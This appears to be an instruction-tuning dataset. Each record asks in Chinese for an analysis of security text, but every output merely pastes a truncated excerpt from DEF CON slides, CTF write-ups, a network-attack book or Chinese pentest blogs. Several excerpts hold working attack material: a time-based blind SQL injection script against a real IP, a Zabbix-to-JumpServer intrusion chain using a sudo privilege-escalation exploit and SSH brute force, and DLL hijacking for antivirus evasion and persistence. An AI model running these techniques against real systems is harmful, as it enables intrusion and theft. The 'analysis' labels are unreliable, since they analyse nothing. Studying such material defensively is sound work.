{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow To Make Friends How To Make Friends & & Influence Lock Manufacturers Influence Lock Manufacturers Schuyler Towne & Jon King Schuyler Towne & Jon King DEFCON 16, 2008 DEFCON 16, 2008 Reviewing this on the DEFCON 16 DVD? Be sure to check ndemag.com/DC16 for updates. Much of the material covered in this talk is on-going. This document has been prepared more than a month prior to publication. Any omissions or inaccuracies in this version will have to be forgiven. Please consult the current version for accurate information. Thank you. 07/06/08 2 LOCK-AND-KEY: LOCK-AND-KEY: n. The distinguishing device of n. The distinguishing device of civilization and enlightenment. civilization and enlightenment.   Ambrose Bierce Ambrose Bierce 6/30/08 3 Let's Talk RoboKey System: Developed with the locksport community Kwikset / Weiser's Smartkey Responded to bumping with complete redesign ABUS Plus Fixed flaw found by lockpicker & issued new challenge Medeco Worked with Jon King to mutually release exploit Q&A / Super-secret announcement 07/06/08 4 The RoboKey System John Laughlin with Barry Wels of TOOOL It's easy to love your own baby, but we wanted to get this out to the community. We figured they wouldn't be shy about telling us what was wrong with it. John Laughlin, Stanton Concepts It's easy to love your own baby, but we wanted to get this out to the community. We figured they wouldn't be shy about telling us what was wrong with it. John Laughlin, Stanton Concepts 07/06/08 5 Background John & Bob Laughlin John was a communications engineer Bob was a retired lock engineer When telcom bust John started working with his father Inspiration Both have a healthy interest in security World more interested in security than ever before Opportunity to address a lot of areas that hadn't received the scrutiny they were due How can we secure containers that have to change hands multiple times / survive tough environments 07/06/08 6 Basic Operation Disc-Detainer type mechanism Looks like a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# H1 Thermostat ## [Flag0](./flag0) -- Found - Communication is key - Have you looked at what the app is sending to the server? ## [Flag1](./flag1) -- Found - Doesn't the MAC seem interesting? - Access to the source code would help - Check out the [Android Quickstart][1] video from Hacker101 [1]: https://www.hacker101.com/sessions/android_quickstart", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPwnhub Fantastic Key WP : index.php config.php <?php error_reporting(0); include 'config.php'; $id=$_POST['i']?waf($_POST['i']):rand(1,8); $v=$_POST['v']?waf($_POST['v']):'anime'; $sql=\"desc `acg_{$v}`\"; if (!$conn->query($sql)){ die('no such table'); } $sql = \"SELECT * FROM acg_{$v} where id = '$id'\"; $result=$conn->query($sql); if (!$result){ die('error'); } foreach ($result as $row) { print \"<!-- $row[0] --> \\t\"; print \"$row[1]<br><img src='img/$row[1].jpg' style='width:600px;'> <br>\"; } ?> <?php $con = \"mysql:host=localhost;port=3306;dbname=acg\"; $conn = new PDO($con, 'user', 'user'); $conn->query('set names utf8'); function waf($s) { if (preg_match(\"/select|union|or|and|\\.|\\\\\\\\| |\\)|\\'|\\\"|in|\\*|- |do|set|case|regexp|like|prepare.|.execute|\\/|#|\\\\0/i\",$s)!=false||strlen($ s)>10000) die(); return $s; } ?> payload: <!DOCTYPE html> <html> <head> <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>key</title> </head> <body> <form action='index.php' method='POST'> <select name='v'> <option value =\"anime\">anime</option> <option value =\"character\">character</option><br> </select> <input type='text' name='i' placeholder='id'> <input type='submit' value='query'> </form> </body> </html> #!/usr/bin/python # coding=utf-8 import requests import os import time import binascii def str_to_hexStr(string): str_bin = string.encode('utf-8') return binascii.hexlify(str_bin).decode('utf-8') url='http://139.217.112.201/index.php' dic='0123456789abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWX YZ._@{}' table_name='' for i in range(1,200): for j in dic: sqli_1=\"select if((select(substr(flag, {},1))from(`acg_fff5lll1ll@g`)limit 1)='{}',sleep(3),1)\".format(i,j) hexaa=str_to_hexStr(sqli_1) time1 = time.time() data_1=\"v=anime`%0a`%0awhere%09@x:=0x\"+hexaa+\";prepare%0ast%0dfrom%0d@x;%0 aexecute%0ast;&i=\" headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"} requests.post(url=url,headers=headers,data=data_1) sec = time.time() - time1 if sec > 1: ta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPersona Not Validated - 1362589322691 Digitally signed by Persona Not Validated - 1362589322691 DN: cn=Persona Not Validated - 1362589322691, email=jdenaro@cipherlawgroup.com, ou=S/ MIME, ou=Persona Not Validated, ou=Symantec Trust Network, o=Symantec Corporation Date: 2013.08.08 21:25:51 -04'00' This presentation is not legal advice about your specific situation. This presentation does not create an attorney-client relationship. While these approaches are designed to reduce risk, they cannot eliminate it. DEF CON 21 2 Overview Types of Risks to Researchers Risk Mitigation Strategies Disclosure Options Risk Mitigation for Selling Exploits Your Goal: Be a Harder Target 3 DEF CON 21 Risks in Disclosing or Selling Research Examples: You found out how to see other peoples utility bills by changing the http query string You discovered your neighbors WiFi is using the default password You broke the crypto protecting media You wrote a better RAT Many of the same risks apply 4 DEF CON 21 What are we talking about? Techniques Information relating to both exploits and vulnerabilities that enable another party to obtain unauthorized access to a computer, deny access by others to a computer, or cause permanent or temporary damage to a computer or a network DEF CON 21 5 When is There Risk? Threats of with legal action before conference or disclosure  Chris Paget (IOActive) (Black Hat) - 2007  Princeton Prof. Felten (USENIX) - 2001 Injunction barring disclosure before conference or disclosure  Megamos (USENIX) - 2013  MIT - Massachusetts Bay Transportation Authority (DEFCON) - 2008 6 DEF CON 21 When is There Risk? Legal actions initiated after conference or disclosure  Cisco - Michael Lynn (ISS) (Black Hat) 2005  Civil lawsuit filed after talk  Dmitry Sklyarov (DEFCON)  Taken into custody in Las Vegas after DEFON presentation 7 DEF CON 21 Computer Fraud and Abuse Act accesses without authorization exceeds authorized access by deployment or development effort 8 DEF CON 21 Computer", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n记次渗透测试中的攻击路径本只对从zabbix权限到拿下内jumpserver堡垒机权限的过 程进介绍 0x01 获取zabbix权限 内扫描发现了个研的资产监控平台通过Django进开发且开了debug模式在报 错的信息中成功泄露了zabbix服务器和账号密码 通过该zabbix账号密码成功进到zabbix的后台且当前户为管理员权限 对zabbix系统上监控的主机进观察发现jumpserver服务器在zabbix监控主机中想到wfox 关于zabbix权限利的章http://noahblog.360.cn/zabbixgong-ji-mian-wa-jue-yu-li- yong/可以利zabbix读jumpserver服务器的件 0x02 获取zabbix server权限 先添加zabbix脚本在创建脚本的时候选择zabbix服务器 然后在监测-最新数据下筛选zabbix server并下发脚本执命令成功获取zabbix服务 器权限 在zabbix server上尝试利zabbix_get命令读取件但是出现如下错误 通过查阅资料且重新看了下zabbix server的配置后发现jumpserver是通过zabbix proxy进 数据上报所以只能在jumpserver对应上报数据的zabbix proxy服务器上使zabbix_get 还有种法是wfox章中的第6点通过添加监控项进件读取实际渗透过程中没有注 意到这个是通过拿下了zabbix proxy服务器权限来读取的 0x03 获取zabbix proxy服务器权限 在获取了zabbix server服务器权限后由于不能直接使zabbix_get命令进读件于是尝 试对zabbix server进提权使https://github.com/worawit/CVE-2021-3156项进提 权常好服务器是centossudo版本为1.8.19p2 直接使exploit_defaults_mailer.py这个脚本进提权但是这个脚本在获取sudo版本的时候 有些bug需要动修改下第141为当前sudo的版本 sudo_vers = [1, 8, 19] # get_sudo_version() 1 提权成功 提权成功后对主机进信息收集发现了个数据库账号密码user01/password且同 时发现服务器上存在user01户于是尝试user01/password进SSH爆破很幸运 成功拿下了zabbix proxy服务器的权限 0x04 zabbix任意件读取图为本地环境测试 在zabbix proxy服务器上成功利zabbix_get读取到了jumpserver服务器件 于是思考如何利zabbix任意件读去获取jumpserver服务器权限先尝试读取jumpserver 的配置件默认位置是/opt/jumpserver/config/config.txt jumpserver未对录进权限限制可以读取到jumpserver的配置件信息但是jumpserver 默认是使docker构建且数据库和redis都没有映射出来所以读取出来的redis和数据库账 号密码没办法直接利 于是本地搭建jumpserver环境先了解了/opt/jumpserver录下的录结构根据之前 jumpserver的志件泄露漏洞想通过读取志件信息进获取jumpserver服务器权 限默认的志件路径为/opt/jumpserver/core/logs/jumpserver.log 但是zabbix_get读取件内容存在限制仅能读取于64KB的件 翻了下zabbix关于利vfs.file.contents读件的档 https://www.zabbix.com/documentation/4.0/en/manual/config/items/itemtypes/zabbix _agent发现除了vfs.file.contents外还有个vfs.file.regexp操作概的意思就是输出特 定正则匹配的某然后可以指定从开始和结束的号 于是利该法写了个简单的任意读件的脚本还不够完善 from future import print_function import subprocess target = \"192.168.21.166\" file = \"/opt/jumpserver/core/logs/jumpserver.log\" 1 2 3 4 5 6 for i in range(1, 2000): cmd = 'vfs.file.regexp[{file},\".*\",,{start},{end},]'.format(file=file, start=i, end=i+1) p = subprocess.Pop", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n|||||||||||||||||||| |||||||||||||||||||| ATTACKING NETWORK PROTOCOLS A Hackers Guide to Capture, Analysis, and Exploitation by James Forshaw San Francisco |||||||||||||||||||| |||||||||||||||||||| ATTACKING NETWORK PROTOCOLS. Copyright  2018 by James Forshaw. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher. ISBN-10: 1-59327-750-4 ISBN-13: 978-1-59327-750-5 Publisher: William Pollock Production Editor: Laurel Chun Cover Illustration: Garry Booth Interior Design: Octopod Studios Developmental Editors: Liz Chadwick and William Pollock Technical Reviewers: Cliff Janzen Additional Technical Reviewers: Arrigo Triulzi and Peter Gutmann Copyeditor: Anne Marie Walker Compositors: Laurel Chun and Meg Sneeringer Proofreader: Paula L. Fleming Indexer: BIM Creatives, LLC For information on distribution, translations, or bulk sales, please contact No Starch Press, Inc. directly: No Starch Press, Inc. 245 8th Street, San Francisco, CA 94103 phone: 1.415.863.9900; info@nostarch.com www.nostarch.com Library of Congress Control Number: 2017954429 No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc. Other product and company names mentioned herein may be the trademarks of their respective owners. Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The information in this book is distributed on an As Is basis, without warranty. While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc. shall have any liability to any person or entity with respect to any loss or damage cause", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nImproving Antivirus Accuracy with Hypervisor Assisted Analysis Danny Quist Danny Quist Offensive Computing, LLC dquist@offensivecomputing.net Twitter: ocomputing Danny Quist Reverse engineer Automated reverse engineering Unpacker of strange malware RE Training Course Founder Offensive Computing Largest open collection of malware Blog with research (when able) Ph.D. New Mexico Tech, 2010 Overview Complexities of reverse engineering Discussion of malware detection problem The commercial antivirus industry Hypervisors and Reverse Engineering Improving AV scanning results Complexities of Reverse Engineering Most malware is compiled Intel x86 Assembly code Compiler  Machine code is more complex  Optimizations make C Code  45 lines Relevant Assembly Code  Optimizations make analysis more difficult Total code size is 1,200 instructions  118 Relevant assembly instructions  Much of machine code is compiler boiler plate Reverse Engineering Complexities of Reverse Engineering Executables can be obfuscated Packing / Obfuscations Compiler Information Loss - (Comments, Variable Names, Original Structure of Code Information Loss - (Comments, Variable Names, Original Structure of Code Commercial Antivirus Limited by time and resources Customers get annoyed if results take too long If AV is too invasive, software is uninstalled Example: Symantec Endpoint Protection 11 has 14 kernel mode modules that are loaded Signatures heavily favored by Vendors Fast and easy to implement Decoders, as long as they are fast, used for known obfuscations Time is AVs achilles heel. Detection of new, unknown threats is only 45% Malware Authors Have an Easy Life Slight modifications yield zero detection Modify the icons inside the PE files Remove imports Slight modification of code Most common exploit kits sold for N iterations of AV Guaranteed not detectable Provides a funding source on detection Generic deobfuscation is not possible for AV vendors Types of Packers UPX ASPack FSG PeCompact ASProtect PE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRaspberry MoCA A recipe for compromise Your Presenter Andrew Hunt Graduate student at George Mason University ahunt5@masonlive.gmu.edu The views presented in this talk do not reflect the views of my employer. It is an independent work. Media over Coaxial Alliance  A bunch of media companies got together  How to make use of widely deployed coaxial cabling to deliver content? o Shielded o Lots of frequency bandwidth o Carries signal 500 feet  PHY/MAC specification  Creates a network of the coaxial bus  Delivers guaranteed bandwidths at certain distances What does MoCA look like? MoCA Operation: PHY  PHY is the coaxial cable  Frequencies & signaling o Orthogonal Frequency Division Multiplexing o WAN and LAN channel sets MoCA Operation: MAC  Media Access Control o Scheduled frames o Master node controller o Time Division Multiple Access o Assured speeds PHY Rate (Mbps) Minimum MAC Rate (Mbps) 275 139.87 250 130.78 225 119.45 200 107.74 175 95.64 150 81.98 125 68.32 100 54.65 75 39.82 MoCA, definitely caffeinated  Enables triple play  Desired by ISPs  HDTV requirements  Guaranteed speeds More prevalent than Starbucks  Most consumers dont even know they have it  North American and European service providers already deploy it  In other words, just about every broadband installation o FIOS o Cable/Xfinity o Dish/Satellite o DVR o STB The Wall Wart  Optical cable run from the neighborhood splitter to the home  Optical Network Terminator (ONT) installed on the exterior of the home o Bridges the fiber to coaxial or CAT5 cable o ISP prefers coaxial ! MoCA MoCA Inside  Actiontec Router o SPI firewall o NAT router \" LAN - WAN o 2 MoCA nodes (NC) o MoCA-to-Ethernet bridge  Digital Video Recorder o MoCA networking on board o Depends on Actiontec router \" Time sync \" TV channel data Lets draw that out a little more No Keys Required OH SNAP! TAKE IT ALL Remember, MoCA looks like this? DOUBLE SNAP! ITS OUTSIDE! ATTACK HERE Walk up and jack in  Utility point-of-presence  ONT + root coa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMy journey on SMBGhost Angelboy angelboy@chroot.org @scwuaptx Whoami  Angelboy  Researcher at DEVCORE  CTF Player  HITCON / 217  Chroot  Co-founder of pwnable.tw  Speaker  HITB GSEC 2018/AVTokyo 2018/VXCON Outline  Introduction  Vulnerability - CVE-2020-0796  Exploitation of SMBGhost  From crash to arbitrary memory writing  How can we get code execution from arbitrary memory writing in the past  Method 1 - System root hijack (need some condition)  Method 2 - Abusing MDL Outline  Introduction  Vulnerability - CVE-2020-0796  Exploitation of SMBGhost  From crash to arbitrary memory writing  How can we get code execution from arbitrary memory writing in the past  Method 1 - System root hijack (need some condition)  Method 2 - Abusing MDL Introduction  Server Message Block (SMB) 是 Windows 中常共享檔案的協定基本上只 要安裝完 Windows 就會在 445 port 開啟這樣的協定在企業中更是常  MS17-010  EternalBlue  WannaCry  CVE-2020-0796  SMBGhost Introduction  Server Message Block (SMB) Server Client Negotiate request Negotiate Response Session setup Session setup resp Tree connect Tree connect response Open\\Read  Outline  Introduction  Vulnerability - CVE-2020-0796  Exploitation of SMBGhost  From crash to arbitrary memory writing  How can we get code execution from arbitrary memory writing in the past  Method 1 - System root hijack (need some condition)  Method 2 - Abusing MDL SMBGhost  Environment  Windows 10 19H1, 19H2  SMBCompression  SMB 3.1.1 後開始援對 data 及 command 的壓縮  Protocol ID : 0x424D53FC (\\xfcSMB)  只要 smb 封包開頭是 (\\xfcSMB) 就會 decompress 來解讀後需內 容 Vulnerability Introduction  Server Message Block (SMB) Server Client Negotiate request Negotiate Response Compress Session setup Compress Session setup resp Tree connect Tree connect response Open\\Read   SMBCompression Header SMBGhost Vulnerability SMBGhost  SMBCompression Header  OriginalCompressedSegmentSize  原始壓縮數據的  CompressionAlgorithm  壓縮演算法 LZNT1/LZ77/LZ77+Huffman  可的壓縮法會先在 Negotiate 封包先定義  Offset/Length  Data 中開始壓縮的 offset Vulnerability SMBGhost OriginalCompresse", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWHITE PAPER UWB Real Time Locating Systems: How Secure Radio Communications May Fail in Practice AUTHORS Andrea Palanca Luca Cremona Roya Gordon About Nozomi Networks Labs Nozomi Networks Labs is dedicated to reducing cyber risk for the worlds industrial and critical infrastructure organizations. Through its cybersecurity research and collaboration with industry and institutions, it helps defend the operational systems that support everyday life. The Labs team conducts investigations into industrial device vulnerabilities and, through a responsible disclosure process, contributes to the publication of advisories by recognized authorities. To help the security community with current threats, they publish timely blogs, research papers and free tools. The Threat Intelligence and Asset Intelligence services of Nozomi Networks are supplied by ongoing data generated and curated by the Labs team. To find out more, and subscribe to updates, visit nozominetworks/labs Table of Contents 1. Introduction 4 1.1 Ultra-wideband (UWB) and Real Time Locating Systems (RTLS) 4 1.2 Use Cases 6 1.3 Cyber Threats to Wireless Communications 6 1.4 Motivation 7 2. Methodology and Attack Demos 8 2.1 Scope 8 2.1.1 Industry Scope 8 2.1.2 Technical Scope 10 2.2 TDoA Background and Theory 11 2.2.1 Packet Taxonomy 11 2.2.2 Algorithm Details 12 2.3 Reverse Engineering of Device Network Traffic 14 2.3.1 Sewio RTLS 14 2.3.2 Avalue RTLS 21 2.4 Anchor Coordinates Prerequisite 29 2.5 Adversary Tactics, Techniques and Procedures (TTPs) 34 2.5.1 Traffic Interception 34 2.5.2 Passive Eavesdropping Attacks 38 2.5.3 Active Traffic Manipulation Attacks 42 2.6 Attacks Against Real-world Use Cases 45 2.6.1 Locating and Targeting People/Assets 45 2.6.2 Geofencing 46 2.6.3 Contact Tracing 49 3. Remediations 51 3.1 Segregation and Firewall Rules 51 3.2 Intrusion Detection Systems 53 3.3 Traffic Encryption 54 4. Summary and Key Takeaways 56 4.1 Summary 56 4.1 Key Takeaways 56 4 WHITE PAPER UWB Real Time Locating Sy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## SRM (Reverse, 50p) > The flag is : The valid serial number > [Download](RM.exe) ###ENG [PL](#pl-version) We downloaded windows binary and run it. It asks us to enter serial and checks its validity. We disasembled it, and checked content of its DialogFunc. We can clearly see interesting fragment: ```c if (strlen(v13) != 16 || v13[0] != 67 || v25 != 88 || v13[1] != 90 || v13[1] + v24 != 155 || v13[2] != 57 || v13[2] + v23 != 155 || v13[3] != 100 || v22 != 55 || v14 != 109 || v21 != 71 || v15 != 113 || v15 + v20 != 170 || v16 != 52 || v19 != 103 || v17 != 99 || v18 != 56 ) { // FAIL } else { // OK } ``` Different xXX stand for different characters of input - using debugger it's easy to check which variable is which character. Reversing this check took a while, because every comparsion had to be implemented, but when we succeeded, we get valid serial that turned out to be flag: CZ9dmq4c8g9G7bAX ###PL version Pobieramy windowsową binarkę i uruchamiamy. Prosi ona o podanie serialu i sprawdza jego poprawność. Disasemblujemy ją więc, i patrzymy na zawartośc DialogFunc. Od razu widać ciekawy fragment: ```c if (strlen(v13) != 16 || v13[0] != 67 || v25 != 88 || v13[1] != 90 || v13[1] + v24 != 155 || v13[2] != 57 || v13[2] + v23 != 155 || v13[3] != 100 || v22 != 55 || v14 != 109 || v21 != 71 || v15 != 113 || v15 + v20 != 170 || v16 != 52 || v19 != 103 || v17 != 99 || v18 != 56 ) { // FAIL } else { // OK } ``` Różne vXX odpowiadają za różne znaki inputu - łatwo dojść do tego które odpowiadają za które przy użyciu debuggera. Reversowanie tego zajęło chwilę bo trzeba było porównać wszystkie znaki, ale kiedy się udało, otrzymaliśmy poprawny serial, będący równoczesnie flagą: CZ9dmq4c8g9G7bAX", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 asciijava p 2014https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html ſ //S ı //I K //k p 2014javascriptjava 0x01 FILE:///ETC/PASSWD java javabean org.apache.commons.beanutils.BeanUtils formField person Sex ſ s 0x02 javabean", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlog 利用dll劫持实现免杀与维权 2021-06-29  红蓝对抗 根据软件工程高内聚低耦合的思想把程序要重复使用的代码封装成函数/类方法将软件要重复使用的程序 封装成链接库库分为静态链接库和动态链接库静态链接库顾名思义就是在程序链接阶段打包进文件中 而动态链接库则是在程序运行时再导入调用动态链接库有着加载时复用节省内存补丁更新时可符合开闭 原则等优点也有容易发生版本冲突容易被劫持等缺点Windows平台下的动态链接库常为dll文件linux 则常为so文件 dll劫持概念与类型 dll劫持就是要想方设法地调用到恶意dll为了便于理解需要了解一下目前Windows默认的dll调用顺序 Known DLL 特指 定义在 HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs 中且只能 在System目录中加载的dll们 由此可以引出几种dll劫持的形式 1. 直接将恶意dll暴力替换掉正常dll软件正常功能会受影响 2. 将恶意dll作为中间人转发调用正常dll的导出函数同时加入额外的恶意操作 3. 利用加载顺序的机制让恶意dll先于正常dll加载 4. 利用软件本身缺失的dll加载恶意dll 5. 更改环境变量或是.exe.manifest/.exe.local文件实现dll重定向 如果利用低权限劫持的dll文件会被高权限程序加载运行就是一个权限提升漏洞 找dll劫持的一种方法 通过 Process Monitor 监控dll调用是一种最基础的寻找dll劫持的方式在filter中添加 Path ends with .dll 和 Result is NAME NOT FOUND 规则并且可以加上 Process Name contains xxx 来针对性的找xxx的dll劫持 首页 标签 分类 关于  编写一个加载dll的demo让它加载一个不存在的dll可以监控到加载的路径顺序请无视中文路径乱码 Orz如果这是一个真实的常用软件则可以用来实现上文中的第4种劫持 劫持notepad++的dll 下面以notepad++为例实现上文中的第2种劫持这类dll转发利用 #pragma comment(linker, \"/EXPORT:xxx,@y) 可以很方便地实现 出于免杀上线以及权限维持的考虑我们物色一下尽量符合这些特点的dll 1 2 3 4 5 6 7 8 9 10 11 12 13 14 #include <stdio.h> #include <Windows.h> int main(int argc, char *argv[]) { HMODULE hModule = LoadLibrary(argv[1]); if (hModule) { wprintf(L\"Load Success\\n\"); FreeLibrary(hModule); } else { wprintf(L\"Load Error: %d\\n\", GetLastError()); } } C  1. 后台进程稳定不挂避免主进程退出导致dll一起挂了 2. 容易触发上线行为隐蔽不易被杀软和人工发现 然后我看到了会被 updater/GUP.exe 拉起的 libcurl.dll 以及安装版中存在且可方便地附加到绿色版中 的 NppShell_06.dll 前者是一个软件更新组件后者是Windows右键中 Edit with Notepad++ 的组件会 随explorer.exe加载且不会重复执行只要在文件上按右键就会触发并不需要点击它看到时就已经加载了 dll 由于 GUP.exe 容易退出需要让它加到常驻服务里去我们优先看看 NppShell_06.dll 这是一个会随安 装包的 Context Menu Enty 选项一起安装到软件目录的dll通过 Process Monitor 监控并筛选注册表发现有 如下变动 也就是说只需要将安装文件中的 NppShell_06.dll 拷贝到绿色版文件中并将上述变动导入注册表就可以手 动实现添加右键打开的功能不过该操作需要管理员权限 regedit /s nppi.reg 构造了还不错的触发条件后接下来将原dll更名为 NppShell_05.dll 找出导出函数在我们的恶意dll中按 顺序转发原函数调用并附加恶意操作比如加载shellcode目前已经有很多成熟的工具可以帮助找出这些 导出函数们 文章目录 dll劫持概念 找dll劫持的 劫持notepa 免杀与权限 参考链接 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [HKEY_CLASSES_ROOT\\CLSID\\{B298D29A-A6E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRooting macOS Big Sur on Apple Silicon Xinru Chi and Tielei Wang About us  Xinru Chi  Security Researcher in Pangu Lab  Extensive experience in macOS/iOS vulnerability research  Tielei Wang  Ph.D from PKU, Research scientist at Georgia Tech from 2011-2014  Known for releasing jailbreak tools for iOS 7-9  Organizers of MOSEC (Mobile Security Conference) The story begins with security contents of iOS 14.2 iOS 14.2, released on Nov 5, 2020, fixed an in-the-wild exploit reported by GP0. First in-the-wild exploit since iOS 14 (?) Safari RCE (CVE-2020-27930) kernel info leak (CVE-2020-27950) kernel type confusion (CVE-2020-27932) Lets diff the kernel  Apple still maintains iOS 12 for old devices  Updates for iOS 12.4.9 only have 4 CVEs  Updates for iOS 14.2 have *26* CVEs  Of course, diffing 12.4.9 vs 12.4.8 is better Kernel info leak jumps into eyes Kernel info leak jumps into eyes  Adds bzero mach msg trailer at multiple functions  Apparently, it leaks uninitialized kernel memory from mach msg trailers  Refer to the following links for more analysis https://www.synacktiv.com/publications/ios-1-day-hunting-uncovering-and-exploiting-cve-2020-27950-kernel-memory-leak.html https://bugs.chromium.org/p/project-zero/issues/detail?id=2108 Type confusion seems easy too  host_request_notification function adds an extra check on ports type Type confusion seems easy too  host_request_notification function adds an extra check on ports type Take a quick look at port struct Lets construct a PoC  Plan 1: make a special reply port and pass it to host_request_notification, it may trigger the type confusion Lets construct a PoC  Plan 1: make a special reply port and pass it to host_request_notification, it may trigger the type confusion Lets construct a PoC  Plan 1: make a special reply port and pass it to host_request_notification, it may trigger the type confusion  Unfortunately, no panic.  Maybe we should trigger the notification or deallocate the port? Lets construct a PoC  Maybe we should tr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n原文 by 瞌睡龙 ## 0x00 相关背景介绍 Clickjacking点击劫持是由互联网安全专家罗伯特汉森和耶利米格劳斯曼在2008年首创的 是一种视觉欺骗手段在web端就是iframe嵌套一个透明不可见的页面让用户在不知情的情况下点击攻击者想要欺骗用户点击的位置 由于点击劫持的出现便出现了反frame嵌套的方式因为点击劫持需要iframe嵌套页面来攻击 下面代码是最常见的防止frame嵌套的例子 ``` javascript if(top.location!=location) top.location=self.location; ``` 事实上这种代码很容易被绕过在后文中讨论 ## 0x01 防御的几种方式 防止frame嵌套的js使用代码由高到低比例 ``` javascript if (top != self) if (top.location != self.location) if (top.location != location) if (parent.frames.length > 0) if (window != top) if (window.top !== window.self) if (window.self != window.top) if (parent && parent != window) if (parent && parent.frames && parent.frames.length>0) if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0)) ``` 检测到后的处理方案 ``` javascript top.location = self.location top.location.href = document.location.href top.location.href = self.location.href top.location.replace(self.location) top.location.href = window.location.href top.location.replace(document.location) top.location.href = window.location.href top.location.href = \"URL\" document.write('') top.location = location top.location.replace(document.location) top.location.replace('URL') top.location.href = document.location top.location.replace(window.location.href) top.location.href = location.href self.parent.location = document.location parent.location.href = self.document.location top.location.href = self.location top.location = window.location top.location.replace(window.location.pathname) window.top.location = window.self.location setTimeout(function(){document.body.innerHTML='';},1); window.self.onload = function(evt){document.body.innerHTML='';} var url = window.location.href; top.location.replace(url) ``` ## 0x02 绕过的几种方式 对于使用parent.location来防御的可以使用多层嵌套的方式绕过 ### 一例如防御代码为 ``` javascript if(top.location!=self.location){ parent.location = self.location; } ``` 建立两个页面 1.html代码为 `<iframe src=\"2.html\">` 2.html代码为 `<iframe src=\"http://www.victim.com\">` 访问1.html之后可以看到页面并无跳转等动作 ![click1](../pictures/click1.png) ### 二onBeforeUnload函数", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# BitBitBit (crypto, 8 solved, 860p) In the task we get the [server code](server.py). What happens is we get RSA-encrypted flag from the server, along with the public key and some parameters based on the private key primes. The inteded solution was to analyse the key generation algorithm and recover the private key. But we figured that there is an easier way to solve the problem. Look at the code: ```python from flag import FLAG N, delta, gamma = gen_key() m = int(FLAG.encode('hex'), 16) c = powmod(m, 0x10001, N) ``` If we look at the challenge again we can see that the challenge with every connection gives us public key and encrypted flag. Public key exponent is always the same 65537, and the modulus changes every time. Apart from large `e`, this is pretty much a textbook setup for Hastad Broadcast Attack. The flag doesn't seem to get padded in the code, and it's unlikely to be super long, so maybe we don't even need all 65537 values to recover the flag. There is a PoW to solve when we connect to the server, so it took a while to grab all the necessary data, but once it's done we can proceed to calculate Chinese Remainder Theorem. We even did a parallel solver for that: https://github.com/p4-team/crypto-commons/blob/master/crypto_commons/rsa/crt.py since the calculations can be easily separated into map-reduce steps. Initially we were hoping for a flag around 32 bytes long, so only 10k messages would be enough, but it turned out we needed to get 20k because the flag was: `MeePwnCTF{It_is_the_time_to_move_to_Post_Quantum_Cryptography_DAGS}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.senseofsecurity.com.au  Sense of Security 2013 Page #  13-Sep-13 Compliance, Protection & Business Confidence Sense of Security Pty Ltd ! Sydney Level 8, 66 King Street Sydney NSW 2000 Australia Melbourne Level 10, 401 Docklands Drv Docklands VIC 3008 Australia T: 1300 922 923 T: +61 (0) 2 9290 4444 F: +61 (0) 2 9290 4455 info@senseofsecurity.com.au www.senseofsecurity.com.au ABN: 14 098 237 908 VoIP Wars: Attack of the Cisco Phones www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Speaker  Fatih Ozavci  Senior Security Consultant  Interests  VoIP  Mobile Applications  Network Infrastructure !  Author of Viproy VoIP Penetration Testing Kit  Public Speaker  Defcon, BlackHat Arsenal, AusCert, Ruxcon 2 www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Viproy VoIP Toolkit  Viproy is a Vulcan-ish Word that means \"Call\"  Viproy VoIP Penetration and Exploitation Kit  Testing modules for Metasploit, MSF license  Old techniques, new approach  SIP library for new module development  Custom header support, authentication support  Trust analyser, SIP proxy bounce, MITM proxy, Skinny  Modules  Options, Register, Invite, Message  Brute-forcers, Enumerator  SIP trust analyser,SIP proxy, Fake service  Cisco Skinny analysers  Cisco UCM/UCDM exploits 3 www.senseofsecurity.com.au  